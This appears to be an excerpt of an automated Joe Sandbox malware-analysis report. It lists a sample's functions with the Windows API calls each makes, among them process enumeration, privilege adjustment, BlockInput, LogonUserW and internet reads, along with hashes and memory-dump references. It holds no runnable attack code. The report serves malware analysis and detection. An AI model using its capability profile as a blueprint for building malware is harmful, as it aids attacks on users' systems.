Associated: 00000000.00000002.1704578371.0000000000BCF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704601380.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_WyGagXWAfb.jbxd

Similarity

API ID: __itow__swprintf
String ID:
API String ID: 674341424-0
Opcode ID: 13228dd062dc8eb53ce488c703642c4105a2e471cdda1f216a8d387f97dc2526
Instruction ID: a8251b7f088215e00aa0dadcbd06d47e894a7a2f12b80141356a0f902db8e012
Opcode Fuzzy Hash: 13228dd062dc8eb53ce488c703642c4105a2e471cdda1f216a8d387f97dc2526
Instruction Fuzzy Hash: F122AC716083119FC724DF14D891BAFB7E4EF84700F1049ADF89A97291DB35EA48CB92

Function 00B8F121 Relevance: 6.2, APIs: 4, Instructions: 164processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 00B8F151
Process32FirstW.KERNEL32(00000000,?), ref: 00B8F15F

Part of subcall function 00B17F41: _memmove.LIBCMT ref: 00B17F82

Process32NextW.KERNEL32(00000000,?), ref: 00B8F21F
CloseHandle.KERNEL32(00000000,?,?,?), ref: 00B8F22E

Memory Dump Source

Source File: 00000000.00000002.1704405412.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1704375029.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000BC5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704578371.0000000000BCF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704601380.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_WyGagXWAfb.jbxd

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
String ID:
API String ID: 2576544623-0
Opcode ID: 6057935323577bc5acfaf83e1dffcdd34bf1dcd0656ea0ec5721773757860072
Instruction ID: ff0e3214dcef1b61b0a915c2514733ac3a8c8a262c150fa117d51f75083f3e01
Opcode Fuzzy Hash: 6057935323577bc5acfaf83e1dffcdd34bf1dcd0656ea0ec5721773757860072
Instruction Fuzzy Hash: 0D517071504311AFD320EF24DC85EABBBE8FF94710F50486DF495972A1EB70A948CB92

Function 00B740B1 Relevance: 6.1, APIs: 4, Instructions: 65fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00B740D1
_memset.LIBCMT ref: 00B740F2
DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 00B74144
CloseHandle.KERNEL32(00000000), ref: 00B7414D

Memory Dump Source

Source File: 00000000.00000002.1704405412.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1704375029.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000BC5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704578371.0000000000BCF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704601380.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_WyGagXWAfb.jbxd

Similarity

API ID: CloseControlCreateDeviceFileHandle_memset
String ID:
API String ID: 1157408455-0
Opcode ID: 62163f92d5f7e1304d17d0369e81ceee97992ae92ed0accfdeaaf0e03bf41579
Instruction ID: 996ef43d6092859eeadaa119c5ed606989097d590ddc2cd5787cc6c42387fa62
Opcode Fuzzy Hash: 62163f92d5f7e1304d17d0369e81ceee97992ae92ed0accfdeaaf0e03bf41579
Instruction Fuzzy Hash: D111A7759012287AD7309BA5AD4DFABBBBCEF44760F1041EAF918E7180D7744E808BA4

Function 00B6EB07 Relevance: 5.1, APIs: 1, Strings: 2, Instructions: 561stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,?,?,00000000), ref: 00B6EB19

Strings

|, xrefs: 00B6EB49
(, xrefs: 00B6EB5F

Memory Dump Source

Source File: 00000000.00000002.1704405412.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1704375029.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000BC5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704578371.0000000000BCF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704601380.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_WyGagXWAfb.jbxd

Similarity

API ID: lstrlen
String ID: ($|
API String ID: 1659193697-1631851259
Opcode ID: 26508cd327e63dc0bd2c6c8586ef4b63d613633d4ac342227284089bbf7a6cb0
Instruction ID: 2c9a9cd53004b0820751595617edab431d178f409b1b3361a59c35e0556986aa
Opcode Fuzzy Hash: 26508cd327e63dc0bd2c6c8586ef4b63d613633d4ac342227284089bbf7a6cb0
Instruction Fuzzy Hash: 60322775A00605DFDB28CF19D481A6AB7F1FF48310B15C5AEE8AADB3A1D770E941CB44

Function 00B825E2 Relevance: 4.7, APIs: 3, Instructions: 164networkfileCOMMON

Download Yara Rule

APIs

InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,00B81AFE,00000000), ref: 00B826D5
InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00B8270C

Memory Dump Source

Source File: 00000000.00000002.1704405412.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1704375029.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000BC5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704578371.0000000000BCF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704601380.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_WyGagXWAfb.jbxd

Similarity

API ID: Internet$AvailableDataFileQueryRead
String ID:
API String ID: 599397726-0
Opcode ID: 3fa284b11d15eadea2756f2fe3b5619e7a2f1b7464bc2038bae333f8b97a9fec
Instruction ID: ca3ca477a7fba92875a2919e528098e7986a47fcb7c7d260aec741dcce97cfe9
Opcode Fuzzy Hash: 3fa284b11d15eadea2756f2fe3b5619e7a2f1b7464bc2038bae333f8b97a9fec
Instruction Fuzzy Hash: A441B475900209BFEB20EB95DDC5EBBB7FCEB40724F1040AAF605A6160EA71AE41D754

Function 00B7B59E Relevance: 4.6, APIs: 3, Instructions: 73COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 00B7B5AE
GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 00B7B608
SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 00B7B655

Memory Dump Source

Source File: 00000000.00000002.1704405412.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1704375029.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000BC5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704578371.0000000000BCF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704601380.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_WyGagXWAfb.jbxd

Similarity

API ID: ErrorMode$DiskFreeSpace
String ID:
API String ID: 1682464887-0
Opcode ID: de4ce63b00b820c30dcb57a46973f84760decccdc9d215cef02c38836d79af59
Instruction ID: afd19383ab547d79b8f80c5e1d3748770a4ccfe6b0f18cdd3992f04721f4ef13
Opcode Fuzzy Hash: de4ce63b00b820c30dcb57a46973f84760decccdc9d215cef02c38836d79af59
Instruction Fuzzy Hash: 8E213935A10118EFCB00EFA5D880EADBBF8FF48310F1480AAE945AB251DB31A955CB51

Function 00B68CC3 Relevance: 4.6, APIs: 3, Instructions: 67COMMON

Download Yara Rule

APIs

Part of subcall function 00B30FF6: std::exception::exception.LIBCMT ref: 00B3102C
Part of subcall function 00B30FF6: __CxxThrowException@8.LIBCMT ref: 00B31041

LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00B68D0D
AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00B68D3A
GetLastError.KERNEL32 ref: 00B68D47

Memory Dump Source

Source File: 00000000.00000002.1704405412.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1704375029.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000BC5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704578371.0000000000BCF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704601380.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_WyGagXWAfb.jbxd

Similarity

API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
String ID:
API String ID: 1922334811-0
Opcode ID: aa91c4415e259d49915fb0487ccc87acb0f4ae292a8224dc3b47a832871009c4
Instruction ID: 7a6cc2360db1993fe93b5d034dfef72c664839e75dc94000a5312280e111ad67
Opcode Fuzzy Hash: aa91c4415e259d49915fb0487ccc87acb0f4ae292a8224dc3b47a832871009c4
Instruction Fuzzy Hash: B5116DB1414209AFD728AF54DD85D6BB7FCFB44720B20866EF45697241EF70A8408A64

Function 00B74C03 Relevance: 4.5, APIs: 3, Instructions: 43memoryCOMMON

Download Yara Rule

APIs

AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00B74C2C
CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 00B74C43
FreeSid.ADVAPI32(?), ref: 00B74C53

Memory Dump Source

Source File: 00000000.00000002.1704405412.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1704375029.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000BC5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704578371.0000000000BCF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704601380.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_WyGagXWAfb.jbxd

Similarity

API ID: AllocateCheckFreeInitializeMembershipToken
String ID:
API String ID: 3429775523-0
Opcode ID: 0e3c6104f2aff150bfbee3d28510f8fa130098968fafe5007466fd80da320b82
Instruction ID: 6972856bb9f904bf62a02f9446503ac02bfec111f7f54bbf3b4790a4a1a34f1b
Opcode Fuzzy Hash: 0e3c6104f2aff150bfbee3d28510f8fa130098968fafe5007466fd80da320b82
Instruction Fuzzy Hash: 65F03775A11209BBDB04DFF09D89ABEBBBCEB08211F1044A9A901E2181E7706A048B50

Function 00B1E060 Relevance: 3.5, APIs: 2, Instructions: 539COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1704405412.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1704375029.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000BC5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704578371.0000000000BCF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704601380.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_WyGagXWAfb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 096f938c16ba9bf7a7592f16999012b335e47fb45c440d42413e5bd1695f967e
Instruction ID: f2f73df77f54990bbe781a8f5516eca13d38912b4bfbad5e8b354551e3568177
Opcode Fuzzy Hash: 096f938c16ba9bf7a7592f16999012b335e47fb45c440d42413e5bd1695f967e
Instruction Fuzzy Hash: 41226874A00216DFDB24DF58D490AAEB7F1FF08300F6485A9EC66AB351E734E985CB91

Function 00B7C93C Relevance: 3.1, APIs: 2, Instructions: 52fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 00B7C966
FindClose.KERNEL32(00000000), ref: 00B7C996

Memory Dump Source

Source File: 00000000.00000002.1704405412.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1704375029.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000BC5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704578371.0000000000BCF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704601380.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_WyGagXWAfb.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: a44987b69bb3e01d4697fc989d639167662cce7008156e090e9717a1f3470c16
Instruction ID: 02115f66122b82e09afb150c601b021a879ab7d8175afe487ed972e4c2ad2c3e
Opcode Fuzzy Hash: a44987b69bb3e01d4697fc989d639167662cce7008156e090e9717a1f3470c16
Instruction Fuzzy Hash: D31161726106009FD710EF29D855A6AFBE9FF85324F04855EF9A9D7291DB34AC04CB81

Function 00B7A2D5 Relevance: 3.0, APIs: 2, Instructions: 31windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,00B8977D,?,00B9FB84,?), ref: 00B7A302
FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,00B8977D,?,00B9FB84,?), ref: 00B7A314

Memory Dump Source

Source File: 00000000.00000002.1704405412.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1704375029.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000BC5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704578371.0000000000BCF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704601380.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_WyGagXWAfb.jbxd

Similarity

API ID: ErrorFormatLastMessage
String ID:
API String ID: 3479602957-0
Opcode ID: 5f2efb6a103505340181f806875d42e69bcdb42bc1f47bb2efe5a2e076a44d1c
Instruction ID: 47d0267d05f5bb4dbcdd8cefd4195f28e3681cab288dd68610e26ca7f41e646d
Opcode Fuzzy Hash: 5f2efb6a103505340181f806875d42e69bcdb42bc1f47bb2efe5a2e076a44d1c
Instruction Fuzzy Hash: 01F0823554422DBBDB109FA4CC48FFA77ADFF08761F0082A6F919D7181DA309940CBA1

Function 00B68713 Relevance: 3.0, APIs: 2, Instructions: 22COMMON

Download Yara Rule

APIs

AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00B68851), ref: 00B68728
CloseHandle.KERNEL32(?,?,00B68851), ref: 00B6873A

Memory Dump Source

Source File: 00000000.00000002.1704405412.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1704375029.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000BC5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704578371.0000000000BCF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704601380.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_WyGagXWAfb.jbxd

Similarity

API ID: AdjustCloseHandlePrivilegesToken
String ID:
API String ID: 81990902-0
Opcode ID: 8c6bcec002ec3de5482265b109d196f1158ae395491630fec44f94e0b425ffec
Instruction ID: 2b6c388433d0ba2328667de40c0626e1677fbf14c85691d813b72fd27de0978e
Opcode Fuzzy Hash: 8c6bcec002ec3de5482265b109d196f1158ae395491630fec44f94e0b425ffec
Instruction Fuzzy Hash: D2E0B676014611EFE7252B64ED09D777BEDEB04360B24896AB496C1470DB62AC90DB10

Function 00B3A395 Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(00000000,?,00B38F97,?,?,?,00000001), ref: 00B3A39A
UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 00B3A3A3

Memory Dump Source

Source File: 00000000.00000002.1704405412.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1704375029.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000BC5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704578371.0000000000BCF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704601380.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_WyGagXWAfb.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 34db4b2a24410c99576d59fce2880c6fd09d1c7a879a36809f7288852da18e47
Instruction ID: fc3cfe6f83bc9353b2479bf952e95f3d269be20be8902a80ad98d14cef7df4a8
Opcode Fuzzy Hash: 34db4b2a24410c99576d59fce2880c6fd09d1c7a879a36809f7288852da18e47
Instruction Fuzzy Hash: 46B0923105820AEBCA002BA1ED09BA83F68EB44BB2F404022F60DC6062CF6654A08A99

Function 00B3F419 Relevance: 2.1, APIs: 1, Instructions: 645COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1704405412.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1704375029.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000BC5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704578371.0000000000BCF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704601380.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_WyGagXWAfb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2d782353a21941df3ebec7f0d625ae6d720ce3b0fafe4611423019a000ca7855
Instruction ID: 0755678476450262195344823dfbc439e20db17db9216f069d137f1cd9aefa43
Opcode Fuzzy Hash: 2d782353a21941df3ebec7f0d625ae6d720ce3b0fafe4611423019a000ca7855
Instruction Fuzzy Hash: 5832D361DA9F424DD7239634DC72336A289EFB73C4F65D737E819B69A6EF2884834100

Function 00B4267E Relevance: 1.8, APIs: 1, Instructions: 294COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1704405412.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1704375029.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000BC5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704578371.0000000000BCF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704601380.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_WyGagXWAfb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 84c5f8811b10579390b36ab70b86e9ed43ec828ac27a341dc52dde65ca7a4183
Instruction ID: 5a482ca459b8b434da71110bf2fe0f1211f6c585a9fd81a780a2a66d6551bac8
Opcode Fuzzy Hash: 84c5f8811b10579390b36ab70b86e9ed43ec828ac27a341dc52dde65ca7a4183
Instruction Fuzzy Hash: 3CB11120D2AF414DD76396398832336BB9CAFBB2C5F91D71BFC2671D22EB2185839141

Function 00B78B13 Relevance: 1.6, APIs: 1, Instructions: 68COMMON

Download Yara Rule

APIs

__time64.LIBCMT ref: 00B78B25

Part of subcall function 00B3543A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,00B791F8,00000000,?,?,?,?,00B793A9,00000000,?), ref: 00B35443
Part of subcall function 00B3543A: __aulldiv.LIBCMT ref: 00B35463

Memory Dump Source

Source File: 00000000.00000002.1704405412.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1704375029.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000BC5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704578371.0000000000BCF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704601380.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_WyGagXWAfb.jbxd

Similarity

API ID: Time$FileSystem__aulldiv__time64
String ID:
API String ID: 2893107130-0
Opcode ID: 9bc2c35e3c29be91a4352f68835ec053c7e15faa0b18047dd9d833d4e52f7010
Instruction ID: 6c7650e856e41f55ffa1cd9e045a1c3efff2a500578007f20b7baa12c8c0bb99
Opcode Fuzzy Hash: 9bc2c35e3c29be91a4352f68835ec053c7e15faa0b18047dd9d833d4e52f7010
Instruction Fuzzy Hash: 2421E4726355108BC329CF25D451A92F3E1EBA4321B288EADD0F9CB2D0DE35B905CB94

Function 00B841FD Relevance: 1.5, APIs: 1, Instructions: 25keyboardCOMMON

Download Yara Rule

APIs

BlockInput.USER32(00000001), ref: 00B84218

Memory Dump Source

Source File: 00000000.00000002.1704405412.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1704375029.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000BC5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704578371.0000000000BCF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704601380.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_WyGagXWAfb.jbxd

Similarity

API ID: BlockInput
String ID:
API String ID: 3456056419-0
Opcode ID: f1be28313d8d609e81b534911ace49ffc2ffe140c093a70a1bacfacd0369c658
Instruction ID: 8a6640788f7644da39a59069071489ce5ea1c87ecb3f17ba0d60f0201613c586
Opcode Fuzzy Hash: f1be28313d8d609e81b534911ace49ffc2ffe140c093a70a1bacfacd0369c658
Instruction Fuzzy Hash: 9CE04F312542159FC710EF59D844A9AF7E8EF95760F008066FC49C7362DB70F840CBA0

Function 00B74EF5 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

mouse_event.USER32(00000004,00000000,00000000,00000000,00000000), ref: 00B74F18

Memory Dump Source

Source File: 00000000.00000002.1704405412.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1704375029.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000BC5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704578371.0000000000BCF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704601380.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_WyGagXWAfb.jbxd

Similarity

API ID: mouse_event
String ID:
API String ID: 2434400541-0
Opcode ID: e3b3d9a1dda5b065f1e906e1dc9012394c0322984eaae5a4ebcd1a4789de0f49
Instruction ID: a684c4bc1c894bab2a1e0d9bf9095f4d433dbddf60203c0fa14b20139a8a8ce7
Opcode Fuzzy Hash: e3b3d9a1dda5b065f1e906e1dc9012394c0322984eaae5a4ebcd1a4789de0f49
Instruction Fuzzy Hash: 5AD05EB0164209B8FC184B20AC0FF760188E341793FE4C9C9B22DCD4D29BE16850A034

Function 00B68C93 Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

LogonUserW.ADVAPI32(?,00000001,?,?,00000000,00B688D1), ref: 00B68CB3

Memory Dump Source

Source File: 00000000.00000002.1704405412.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1704375029.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000BC5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704578371.0000000000BCF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704601380.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_WyGagXWAfb.jbxd

Similarity

API ID: LogonUser
String ID:
API String ID: 1244722697-0
Opcode ID: 45a83486f1438df5432d0b94cc8267b72106cbdd01c243218807b844c4abb859
Instruction ID: aa7f5b776e84821544386225ff2853130f07fc9ae8b9620b98e93d2065c7202a
Opcode Fuzzy Hash: 45a83486f1438df5432d0b94cc8267b72106cbdd01c243218807b844c4abb859
Instruction Fuzzy Hash: E9D05E3226450EABEF018EA4DD01EBE3B69EB04B01F408111FE15C60A1C775D835AB60

Function 00B52230 Relevance: 1.5, APIs: 1, Instructions: 7COMMON

Download Yara Rule

APIs

GetUserNameW.ADVAPI32(?,?), ref: 00B52242

Memory Dump Source

Source File: 00000000.00000002.1704405412.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1704375029.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000BC5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704578371.0000000000BCF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704601380.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_WyGagXWAfb.jbxd

Similarity

API ID: NameUser
String ID:
API String ID: 2645101109-0
